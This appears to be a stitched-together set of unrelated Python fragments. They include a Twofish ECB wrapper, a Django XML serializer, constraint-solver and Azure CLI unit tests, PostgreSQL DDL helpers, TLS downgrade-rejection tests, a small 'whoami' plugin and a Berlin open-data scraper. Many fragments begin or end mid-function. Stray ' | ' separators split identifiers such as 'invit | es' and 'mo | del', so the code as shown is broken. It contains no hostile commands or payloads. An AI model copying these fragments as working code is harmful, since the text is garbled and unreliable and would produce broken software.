# Copyright (C) 2008 Christoph Sommer <mail@christoph-sommer.de>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should h | ave received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import twofish
class TwofishECB:
"""
Electronic codebook (ECB) Twofish operation mode.
"""
def __init__(self, key):
"""
Set the key to be used for en-/de-cryption.
"""
self.twofish = twofish.Twofish() |
self.twofish.set_key(key)
def encrypt(self, plaintext):
"""
Encrypt the given string using Twofish ECB.
"""
if len(plaintext) % 16:
raise RuntimeError("Twofish plaintext length must be a multiple of 16")
ciphertext = ""
while len(plaintext) >= 16:
ciphertext += self.twofish.encrypt(plaintext[0:16])
plaintext = plaintext[16:]
return ciphertext
def decrypt(self, ciphertext):
"""
Decrypt the given string using Twofish ECB.
"""
if len(ciphertext) % 16:
raise RuntimeError("Twofish ciphertext length must be a multiple of 16")
plaintext = ""
while len(ciphertext) >= 16:
plaintext += self.twofish.decrypt(ciphertext[0:16])
ciphertext = ciphertext[16:]
return plaintext
def test_twofish_ecb():
__testkey = "Now Testing Crypto-Functions...."
__testenc = "Passing nonsense through crypt-API, will then do assertion check"
__testdec = "\x71\xbf\x8a\xc5\x8f\x6c\x2d\xce\x9d\xdb\x85\x82\x5b\x25\xe3\x8d\xd8\x59\x86\x34\x28\x7b\x58\x06\xca\x42\x3d\xab\xb7\xee\x56\x6f\xd3\x90\xd6\x96\xd5\x94\x8c\x70\x38\x05\xf8\xdf\x92\xa4\x06\x2f\x32\x7f\xbd\xd7\x05\x41\x32\xaa\x60\xfd\x18\xf4\x42\x15\x15\x56"
assert TwofishECB(__testkey).decrypt(__testenc) == __testdec
assert TwofishECB(__testkey).encrypt(__testdec) == __testenc
test_twofish_ecb() |
"""
Called after handling all fields for an object.
"""
self.indent(1)
self.xml.endElement("object")
def handle_field(self, obj, field):
"""
Called to handle each field on an object (except for ForeignKeys and
ManyToManyFields)
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"type" : field.get_internal_type()
})
# Get a "string version" of the object's data.
if getattr(obj, field.name) is not None:
self.xml.characters(field.value_to_string(obj))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_fk_field(self, obj, field):
"""
Called to handle a ForeignKey (we need to treat them slightly
differently from regular fields).
"""
self._start_relational_field(field)
related = getattr(obj, field.name)
if related is not None:
if self.use_natural_keys and hasattr(related, 'natural_key'):
# If related object has a natural key, use it
related = related.natural_key()
# Iterable natural keys are rolled out as subelements
for key_value in related:
self.xml.startElemen | t("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.end | Element("natural")
else:
if field.rel.field_name == related._meta.pk.name:
# Related to remote object via primary key
related = related._get_pk_val()
else:
# Related to remote object via other field
related = getattr(related, field.rel.field_name)
self.xml.characters(smart_unicode(related))
else:
self.xml.addQuickElement("None")
self.xml.endElement("field")
def handle_m2m_field(self, obj, field):
"""
Called to handle a ManyToManyField. Related objects are only
serialized as references to the object's PK (i.e. the related *data*
is not dumped, just the relation).
"""
if field.rel.through._meta.auto_created:
self._start_relational_field(field)
if self.use_natural_keys and hasattr(field.rel.to, 'natural_key'):
# If the objects in the m2m have a natural key, use it
def handle_m2m(value):
natural = value.natural_key()
# Iterable natural keys are rolled out as subelements
self.xml.startElement("object", {})
for key_value in natural:
self.xml.startElement("natural", {})
self.xml.characters(smart_unicode(key_value))
self.xml.endElement("natural")
self.xml.endElement("object")
else:
def handle_m2m(value):
self.xml.addQuickElement("object", attrs={
'pk' : smart_unicode(value._get_pk_val())
})
for relobj in getattr(obj, field.name).iterator():
handle_m2m(relobj)
self.xml.endElement("field")
def _start_relational_field(self, field):
"""
Helper to output the <field> element for relational fields
"""
self.indent(2)
self.xml.startElement("field", {
"name" : field.name,
"rel" : field.rel.__class__.__name__,
"to" : smart_unicode(field.rel.to._meta),
})
class Deserializer(base.Deserializer):
"""
Deserialize XML.
"""
def __init__(self, stream_or_string, **options):
super(Deserializer, self).__init__(stream_or_string, **options)
self.event_stream = pulldom.parse(self.stream)
self.db = options.pop('using', DEFAULT_DB_ALIAS)
def next(self):
for event, node in self.event_stream:
if event == "START_ELEMENT" and node.nodeName == "object":
self.event_stream.expandNode(node)
return self._handle_object(node)
raise StopIteration
def _handle_object(self, node):
"""
Convert an <object> node to a DeserializedObject.
"""
# Look up the model using the model loading mechanism. If this fails,
# bail.
Model = self._get_model_from_node(node, "model")
# Start building a data dictionary from the object. If the node is
# missing the pk attribute, bail.
pk = node.getAttribute("pk")
if not pk:
raise base.DeserializationError("<object> node is missing the 'pk' attribute")
data = {Model._meta.pk.attname : Model._meta.pk.to_python(pk)}
# Also start building a dict of m2m data (this is saved as
# {m2m_accessor_attribute : [list_of_related_objects]})
m2m_data = {}
# Deseralize each field.
for field_node in node.getElementsByTagName("field"):
# If the field is missing the name attribute, bail (are you
# sensing a pattern here?)
field_name = field_node.getAttribute("name")
if not field_name:
raise base.DeserializationError("<field> node is missing the 'name' attribute")
# Get the field from the Model. This will raise a
# FieldDoesNotExist if, well, the field doesn't exist, which will
# be propagated correctly.
field = Model._meta.get_field(field_name)
# As is usually the case, relation fields get the special treatment.
if field.rel and isinstance(field.rel, models.ManyToManyRel):
m2m_data[field.name] = self._handle_m2m_field_node(field_node, field)
elif field.rel and isinstance(field.rel, models.ManyToOneRel):
data[field.attname] = self._handle_fk_field_node(field_node, field)
else:
if field_node.getElementsByTagName('None'):
value = None
else:
value = field.to_python(getInnerText(field_node).strip())
data[field.name] = value
# Return a DeserializedObject so that the m2m data has a place to live.
return base.DeserializedObject(Model(**data), m2m_data)
def _handle_fk_field_node(self, node, field):
"""
Handle a <field> node for a ForeignKey
"""
# Check if there is a child node named 'None', returning None if so.
if node.getElementsByTagName('None'):
return None
else:
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
keys = node.getElementsByTagName('natural')
if keys:
# If there are 'natural' subelements, it must be a natural key
field_value = [getInnerText(k).strip() for k in keys]
obj = field.rel.to._default_manager.db_manager(self.db).get_by_natural_key(*field_value)
obj_pk = getattr(obj, field.rel.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.rel.to._meta.pk.rel:
obj_pk = obj_pk.pk
else:
# Otherwise, treat like a normal PK
field_value = getInnerText(node).strip()
obj_pk = field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
return obj_pk
else:
field_value = getInnerText(node).strip()
return field.rel.to._meta.get_field(field.rel.field_name).to_python(field_value)
def _handle_m2m_field_node(self, node, field):
"""
Handle a <field> node for a ManyToManyField.
"""
if hasattr(field.rel.to._default_manager, 'get_by_natural_key'):
def m2m_convert(n):
|
invites = ['Queen Elizabeth II', 'Prince Philip','Duchess Kate','Prince William']
hello = "Your majesty "
message = ", you are invited to the Royal Dinner Party. \n- King George"
rsvp_qe = hello + invites[0] + message
rsvp_pp = hello + invites[1] + message
rsvp_dk = hello + invit | es[2] + message
rsvp_pw = hello + invites[3] + message
print(rsvp_qe)
print(rsvp_pp)
print(rsvp_dk)
print(rsvp_pw)
# Prince Philip cannot make it so we are inviting Princess Margaret
print('\n' + invites[1] + ' cannot make it to the dinner')
invites[1] = 'Princess Margaret'
rsvp_pm = hello + invites[1] | + message
print('\n' + rsvp_qe)
print(rsvp_pm)
print(rsvp_dk)
print(rsvp_pw)
print("\nThere are " + str(len(invites)) + " people invited to dinner.")
|
model.add_variable((obj1, obj2, obj3, vol_sum, capacity))
model.add_constraint(Leq((vol_sum, capacity)))
solver = Solver(model)
'''
obj1.print_domain()
obj2.print_domain()
obj3.print_domain()
vol_sum.print_domain()
capacity.print_domain()
'''
assert( solver.solve() )
'''
obj1.print_domain()
obj2.print_domain()
obj3.print_domain()
vol_sum.print_domain()
capacity.print_domain()
'''
#def testBinSearch(self):
# var1 = Variable(range(0,3))
#assert( var1.find([1,3,4], 2)[0] == 0)
def testSumProp(self):
var1, var2, var3, var4 = (Variable(list(range(1,5))) for x in range(0,4))
var3 = Variable([1,10])
var4 = Variable([2,10])
sum1 = Sum((var1, var2))
sum2 = Sum(((var3, var4), (1,2)))
model = NativeModel()
model.add_variable((var1, var2, var3, var4, sum1, sum2))
model.add_constraint(Equal((sum1, sum2)))
solver = Solver(model)
assert(solver.solve())
#print [x.get_value() for x in (var1, var2, var3, var4)]
assert(var1.get_value() + var2.get_value() == var3.get_value() + var4.get_value()*2)
def testVarExtractionNeq(self):
var1, var2 = (Variable(list(range(0,3))) for x in range(0,2))
model = NativeModel()
model.add_constraint(NotEqual((var1, var2)))
solver = Solver(model)
assert(solver.solve())
#print [v.get_value() for v in (var1, var2)]
def testVarExtractionWSum(self):
var1 = Variable(list(range(2,3)))
var2 = Variable(list(range(2,3)))
var3 = Variable(list(range(3,10)))
model = NativeModel()
model.add_constraint(Equal((Sum(((var1, var2), (2,1))), var3)))
solver = Solver(model)
#svar.print_domain()
assert( solver.solve() )
'''
Operator overloading tests
'''
def testOperatorOVerloading(self):
var1 = Variable(list(range(0,4)))
var2 = Variable(list(range(0,4)))
model = NativeModel()
model.add_constraint(var1 != var2)
solver = Solver(model)
assert(solver.solve())
def testEqualOver(self):
var1 = Variable([0])
var2 = Variable(list(range(0,1)))
model = NativeModel()
model.add_constraint(var1 == var2)
solver = Solver(model)
assert(solver.solve())
def testStupid_not_eqOver(self):
var1 = Variable(list(range(0,3)))
var2 = Variable(list(range(0,3)))
model = NativeModel()
model.add_constraint(var1 != var2)
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() != var2.get_value())
def testGEQOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 >= var2)
model.add_constraint(var2 >= var3)
model.add_constraint(var1 >= var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLEQOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
|
model.add_constraint(var1 <= var2)
model.add_constraint(var2 <= var3)
model.add_constraint(var1 <= var3)
mo | del.add_constraint(var1 == var2)
model.add_constraint(var2 != var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testLTOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 < var2)
model.add_constraint(var2 < var3)
model.add_constraint(var1 < var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testGTOver(self):
var1, var2, var3 = (Variable(list(range(0,3))) for x in range(0,3))
model = NativeModel()
model.add_constraint(var1 < var2)
model.add_constraint(var2 < var3)
model.add_constraint(var1 < var3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d %d " % (var1.get_value(), var2.get_value(), var3.get_value())
def testPlusOver(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 + 3)
solver = Solver(model)
assert(solver.solve())
#print "%d %d " % (var1.get_value(), var2.get_value())
def testMinusOver(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 - 3)
solver = Solver(model)
assert(solver.solve())
def testTimesOver(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model.add_constraint(var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testMinusOverNativeModelOp(self):
var1, var2 = (Variable(list(range(0,4))), Variable(list(range(0,4))))
model = NativeModel()
model << (var1 == var2 - 3)
solver = Solver(model)
assert(solver.solve())
def testTimesOverNativeModelOp(self):
var1, var2 = (Variable(list(range(1,4))), Variable(list(range(0,4))))
model = NativeModel()
model << (var1 == var2 * 2)
solver = Solver(model)
assert(solver.solve())
def testMaximization(self):
model = NativeModel()
var1, var2 = (Variable(0,4) for x in range(0,2))
var3 = Variable(0,10)
model << (var1 + var2 == var3)
solver = Solver(model)
assert( solver.maximise(var3) )
#print [v.get_value() for v in (var1, var2, var3)]
def testNegDomains(self):
var1 = Variable(-3, -1)
var2 = Variable(-2, 0)
model = NativeModel()
model << (var1*2 <= var2)
solver = Solver(model)
assert(solver.solve())
'''
Tests of stuff implemented from minizinc stuff
'''
def testAtLeastSAT(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 2, 2)))
solver = Solver(model)
assert(solver.solve())
assert(var1.get_value() is 2)
assert(var2.get_value() is 2)
def testAtLeastUNSAT_1(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 6, 2)))
solver = Solver(model)
assert(not solver.solve())
def testAtLeastUNSAT_2(self):
model = NativeModel()
var1, var2 = (Variable(0,5), Variable(0,5))
model << (AtLeast(([var1, var2], 0, 3)))
solver = Solver(model)
assert(not solver.solve())
def testAtMost(self):
model = NativeModel()
var1, var2 = (Variable(2,2), Variable(0,5))
model << (AtMost(([var1, var |
from collections import namedtuple
from foil.formatters import format_repr
from postpy.ddl import (
compile_column, compile_qualified_name, compile_primary_key,
compile_creat | e_table, compile_create_temporary_table
)
__all__ = ('Database', 'Schema', 'Table', 'Column', 'PrimaryKey', 'View')
class Database:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE DATABASE %s;' % self.name
def drop_statement(s | elf):
return 'DROP DATABASE IF EXISTS %s;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Schema:
__slots__ = 'name',
def __init__(self, name):
self.name = name
def create_statement(self):
return 'CREATE SCHEMA IF NOT EXISTS %s;' % self.name
def drop_statement(self):
return 'DROP SCHEMA IF EXISTS %s CASCADE;' % self.name
def __repr__(self):
return format_repr(self, self.__slots__)
class Table(namedtuple('Table', 'name columns primary_key schema')):
"""Table statement formatter."""
__slots__ = ()
def __new__(cls, name: str, columns, primary_key, schema='public'):
return super(Table, cls).__new__(cls, name, columns,
primary_key,
schema)
def create_statement(self):
return compile_create_table(self.qualified_name,
self.column_statement,
self.primary_key_statement)
def drop_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.qualified_name)
def create_temporary_statement(self):
"""Temporary Table Statement formatter."""
return compile_create_temporary_table(self.name,
self.column_statement,
self.primary_key_statement)
def drop_temporary_statement(self):
return 'DROP TABLE IF EXISTS {};'.format(self.name)
@property
def qualified_name(self):
return compile_qualified_name(self.name, schema=self.schema)
@property
def column_names(self):
return [column.name for column in self.columns]
@property
def primary_key_columns(self):
return self.primary_key.column_names
@property
def column_statement(self):
return ' '.join(c.create_statement() for c in self.columns)
@property
def primary_key_statement(self):
return self.primary_key.create_statement()
class Column(namedtuple('Column', 'name data_type nullable')):
__slots__ = ()
def __new__(cls, name: str, data_type: str, nullable=False):
return super(Column, cls).__new__(cls, name, data_type, nullable)
def create_statement(self):
return compile_column(self.name, self.data_type, self.nullable)
class PrimaryKey(namedtuple('PrimaryKey', ['column_names'])):
__slots__ = ()
def __new__(cls, column_names: list):
return super(PrimaryKey, cls).__new__(cls, column_names)
def create_statement(self):
return compile_primary_key(self.column_names)
class View:
"""Postgresql View statement formatter.
Attributes
----------
name : view name
statement: the select or join statement the view is based on.
"""
def __init__(self, name: str, statement: str):
self.name = name
self.statement = statement
def drop_statement(self):
return 'DROP VIEW IF EXISTS {};'.format(self.name)
def create_statement(self):
return 'CREATE VIEW {name} AS {statement};'.format(
name=self.name, statement=self.statement)
def make_delete_table(table: Table, delete_prefix='delete_from__') -> Table:
"""Table referencing a delete from using primary key join."""
name = delete_prefix + table.name
primary_key = table.primary_key
key_names = set(primary_key.column_names)
columns = [column for column in table.columns if column.name in key_names]
table = Table(name, columns, primary_key)
return table
def split_qualified_name(qualified_name: str, schema='public'):
if '.' in qualified_name:
schema, table = qualified_name.split('.')
else:
table = qualified_name
return schema, table
def order_table_columns(table: Table, column_names: list) -> Table:
"""Record table column(s) and primary key columns by specified order."""
unordered_columns = table.column_names
index_order = (unordered_columns.index(name) for name in column_names)
ordered_columns = [table.columns[i] for i in index_order]
ordered_pkey_names = [column for column in column_names
if column in table.primary_key_columns]
primary_key = PrimaryKey(ordered_pkey_names)
return Table(table.name, ordered_columns, primary_key, table.schema)
|
from oplogreplayer im | port OplogReplayer | |
import os
import pytest
import requests
from keybar.client import TLS12SSLAdapter
from keybar.tests.helpers import LiveServerTest
from keybar.tests.factories.user import UserFactory
from keybar.tests.factories.device import (
AuthorizedDeviceFactory, PRIVATE_KEY, PRIVATE_KEY2)
from keybar.utils.http import InsecureTransport
def verify_rejected_ssl(url):
"""
The utility verifies that the url raises SSLError if the remote server
supports only weak ciphers.
"""
with pytest.raises(requests.exceptions.SSLError):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
session.get(url)
return True
@pytest.mark.django_db(transaction=True)
class TestTestClient(LiveServerTest):
def test_url_must_be_https(self):
client = self.get_client(None, None)
with pytest.raises(InsecureTransport):
client.get('http://fails.xy')
def test_simple_unauthorized(self):
user = UserFactory.create()
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, None)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
def test_simple_authorized(self):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 200
assert response.content == b'"{\\"dummy\\": \\"ok\\"}"'
def test_simple_wrong_device_secret(self, settings):
user = UserFactory.create(is_superuser=True)
device = AuthorizedDeviceFactory.create(user=user)
client = self.get_client(device.id, PRIVATE_KEY2)
endpoint = '{0}/api/dummy/'.format(self.liveserver.url)
response = client.get(endpoint)
assert response.status_code == 401
assert response.json()['detail'] == 'Error decoding signature.'
def test_to_server_without_tls_10(self, allow_offline):
"""
Verify that connection is possible to SFDC servers that disabled TLS 1.0
"""
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://tls1test.salesforce.com/s/')
assert response.status_code == 200
def test_under_downgrade_attack_to_ssl_3(self, allow_offline):
"""
Verify that the connection is rejected if the remote server (or man
in the middle) claims that SSLv3 is the best supported protocol.
"""
url = 'https://ssl3.zmap.io/sslv3test.js'
assert verify_rejected_ssl(url)
def test_protocols_by_ssl_labs(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdapter())
response = session.get('https://www.ssllabs.com/ssltest/viewMyClient.html')
assert 'Your user agent has good protocol support' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_sni_suport(self, allow_offline):
session = requests.Session()
session.mount('https://', TLS12SSLAdap | ter())
response = session.get('https://sni.velox.ch/')
assert 'sent the following TLS se | rver name indication extension' in response.text
assert 'negotiated protocol: TLSv1.2' in response.text
@pytest.mark.skipif(os.environ.get('ON_TRAVIS', None) == 'true', reason='on travis')
def test_vulnerability_logjam_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10445/')
def test_vulnerability_freak_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10444/')
def test_vulnerability_osx_by_ssl_labs(self, allow_offline):
assert verify_rejected_ssl('https://www.ssllabs.com:10443/')
|
from django.db import models
from django.utils import timezone
import datetime
# Create your models here.
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
def __str__(self): # __unicode__ on Python 2
return self.question_text
def was_published_recently(self):
return self.pub_date >= timezone.now() - datetime.timedelta(days=1)
was_published_recently.admin_or | der_field = 'pub_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
class | Choice(models.Model):
question = models.ForeignKey(Question)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
def __str__(self): # __unicode__ on Python 2
return self.choice_text
|
e operation to get a virtual machine.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:param opt_param: Used to verify reflection correctly
identifies optional params.
:type opt_param: object
:param expand: The expand expression to apply on the operation.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param boolean raw: returns the direct response alongside the
deserialized response
:rtype: VirtualMachine
:rtype: msrest.pipeline.ClientRawResponse if raw=True
"""
pass
def test_register_cli_argument(self):
command_table.clear()
cli_command(None, 'test register sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__))
register_cli_argument('test register sample-vm-get', 'vm_name', CliArgumentType(
options_list=('--wonky-name', '-n'), metavar='VMNAME', help='Completely WONKY name...',
required=False
))
command_table['test register sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test register sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name', required=True),
'vm_name': CliArgumentType(dest='vm_name', required=False),
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existing].options)
self.assertEqual(command_metadata.arguments['vm_name'].options_list, ('--wonky-name', '-n'))
def test_register_command(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_table['test command sample-vm-get'].load_arguments()
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 4, 'We expected exactly 4 arguments')
some_expected_arguments = {
'resource_group_name': CliArgumentType(dest='resource_group_name',
required=True,
help='The name of the resource group.'),
'vm_name': CliArgumentType(dest='vm_name',
required=True,
help='The name of the virtual machine.'),
'opt_param': CliArgumentType(required=False,
help='Used to verify reflection correctly identifies optional params.'), # pylint: disable=line-too-long
'expand': CliArgumentType(required=False,
help='The expand expression to apply on the operation.')
}
for probe in some_expected_arguments:
existing = next(arg for arg in command_metadata.arguments if arg == probe)
self.assertDictContainsSubset(some_expected_arguments[existing].settings,
command_metadata.arguments[existi | ng].options)
self.assertEqual(command_metadata.arguments['resource_group_name'].options_list,
['--resource-group-name'])
def test_register_command_from_extension(self):
command_table.clear()
# A standard command
cli_command(None, 'hello world', 'dumm | y_operation', None)
self.assertEqual(len(command_table), 1)
self.assertEqual(command_table['hello world'].command_source, None)
command_table.clear()
# A command from an extension
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertFalse(cmd_source.overrides_command)
command_table.clear()
# A command from an extension that overrides the original command
cli_command(None, 'hello world', 'dummy_operation', None)
cli_command('{}myextension'.format(EXTENSIONS_MOD_PREFIX), 'hello world', 'dummy_operation', None)
self.assertEqual(len(command_table), 1)
cmd_source = command_table['hello world'].command_source
self.assertTrue(isinstance(cmd_source, ExtensionCommandSource))
self.assertTrue(cmd_source.overrides_command)
command_table.clear()
def test_register_cli_argument_with_overrides(self):
command_table.clear()
global_vm_name_type = CliArgumentType(
options_list=('--foo', '-f'), metavar='FOO', help='foo help'
)
derived_vm_name_type = CliArgumentType(base_type=global_vm_name_type,
help='first modification')
cli_command(None, 'test vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-1',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
cli_command(None, 'test command vm-get-2',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_cli_argument('test', 'vm_name', global_vm_name_type)
register_cli_argument('test command', 'vm_name', derived_vm_name_type)
register_cli_argument('test command vm-get-2', 'vm_name', derived_vm_name_type,
help='second modification')
command_table['test vm-get'].load_arguments()
command_table['test command vm-get-1'].load_arguments()
command_table['test command vm-get-2'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 3,
'We expect exactly three commands in the command table')
command1 = command_table['test vm-get'].arguments['vm_name']
command2 = command_table['test command vm-get-1'].arguments['vm_name']
command3 = command_table['test command vm-get-2'].arguments['vm_name']
self.assertTrue(command1.options['help'] == 'foo help')
self.assertTrue(command2.options['help'] == 'first modification')
self.assertTrue(command3.options['help'] == 'second modification')
command_table.clear()
def test_register_extra_cli_argument(self):
command_table.clear()
cli_command(None, 'test command sample-vm-get',
'{}#Test_command_registration.sample_vm_get'.format(__name__), None)
register_extra_cli_argument(
'test command sample-vm-get', 'added_param', options_list=('--added-param',),
metavar='ADDED', help='Just added this right now!', required=True
)
command_table['test command sample-vm-get'].load_arguments()
_update_command_definitions(command_table)
self.assertEqual(len(command_table), 1,
'We expect exactly one command in the command table')
command_metadata = command_table['test command sample-vm-get']
self.assertEqual(len(command_metadata.arguments), 5, 'We expected exactly 5 arguments')
some_expected_arguments = {
'adde |
"""Pri | nt effective userid
SYNOPSIS:
whoami
DESCRIPTION:
Print the user name associated with current remote
server access rights.
* PASSIVE PLUGIN:
No requests are sent to server, as current user
is known by $USER environment variable (`env USER`);
AUTHOR:
nil0x42 <http://goo.gl/kb | 2wf>
"""
from api import environ
print(environ['USER'])
|
import json, io, re, requests
from bs4 import BeautifulSoup
from datetime import datetime
def get_datasets(url):
r = requests.get(url.format(0))
soup = BeautifulSoup(r.text)
href = soup.select('#block-system-main a')[-1]['href']
last_page = int(re.match(r'.*page=(.*)', href).group(1))
for page in range(last_page + 1):
print( '[DEBUG] page:', page )
r = requests.get(url.format(page))
soup = BeautifulSoup(r.text)
for link in soup.select('h2 a'):
yield (link['href'], link.text)
def get_metadata(url):
r = requests.get(url)
soup = BeautifulSoup(r.text)
metadata = dict()
metadata['_url'] = url.format(d)
metadata['_collection_date'] | = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
for elem in soup.select('.datasetview_container .dataset | view_row'):
for field in elem.select('.field'):
label = field.select('.field-label')[0].text[:-2]
item_list = list()
item = field.select('.field-item')
if label == 'Website':
metadata[label] = item[0].select('a')[0]['href']
elif len(item) == 0:
items = elem.select('.tag_list a')
for i in items:
item_list.append(i.text.strip())
metadata[label] = item_list
else:
metadata[label] = item[0].text.strip()
tags = set()
for elem in soup.select('.tag_list a'):
tags.add(elem.text.strip())
metadata['tags'] = list(tags)
return metadata
if __name__ == '__main__':
base_url = 'http://daten.berlin.de{}'
datasets_url = 'http://daten.berlin.de/datensaetze?page={}'
documents_url = 'http://daten.berlin.de/dokumente?page={}'
all_labels = set()
all_metadata = list()
done_datasets = set()
# iterate over all dataset urls
for d, t in get_datasets(datasets_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type'] = 'dataset'
m['_title'] = t
all_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# iterate over all document urls
for d, t in get_datasets(documents_url):
if d in done_datasets:
print('skip', d)
continue # skip datasets
m = get_metadata(base_url.format(d))
m['_type'] = 'document'
m['_title'] = t
all_metadata.append(m)
for k in m.keys(): all_labels.add(k)
print(json.dumps(m, sort_keys=1, ensure_ascii=False))
done_datasets.add(d)
# write json file
with io.open('daten-berlin_metadata.json', 'w', encoding='utf8') as json_file:
json_file.write((json.dumps(all_metadata, indent=2, sort_keys=True, ensure_ascii=False)))
# write csv
with open('daten-berlin_metadata.csv', 'wb') as csv_file:
for l in sorted(all_labels):
csv_file.write((l + ';').encode('utf8'))
csv_file.write('\n'.encode('utf8'))
for m in all_metadata:
for l in sorted(all_labels):
if l in m:
csv_file.write(str(m[l]).encode('utf8'))
csv_file.write(';'.encode('utf8'))
csv_file.write('\n'.encode('utf8')) |
# #!/usr/bin/env python
#
# import nlopt # THIS IS NOT A P | ACKAGE!
# import numpy as np
#
# print(('nlopt version='+nlopt.__version__))
#
# def f(x, grad):
# F=x[0]
# L=x[1]
# E=x[2]
# I=x[3]
# D=F*L**3/(3.*E*I)
# return D
#
# n = 4
# opt = nlopt.opt(nlopt.LN_COBYLA, n)
# opt.set_min_objective(f)
# lb = np.array([40., 50., 30e3, 1.])
# ub = np.array([60., 60., 40e3, 10.])
# x = (lb+ub)/2.
# opt.set_lower_bounds(lb)
# opt.set_upper_bounds(ub)
# opt.set_xtol_rel(1e-3)
# opt.set_ftol_rel(1e-3)
# xopt = opt.optimize(x)
#
# opt_val = op | t.last_optimum_value()
# result = opt.last_optimize_result()
# print(('opt_result='+str(result)))
# print(('optimizer='+str(xopt)))
# print(('opt_val='+str(opt_val)))
|
#!/usr/bin/env python
# coding=utf-8
"""
Copyright (C) 2010-2013, Ryan Fan <ryan.fan@oracle.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Library General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
from __future__ import absolute_import
import os
import sys
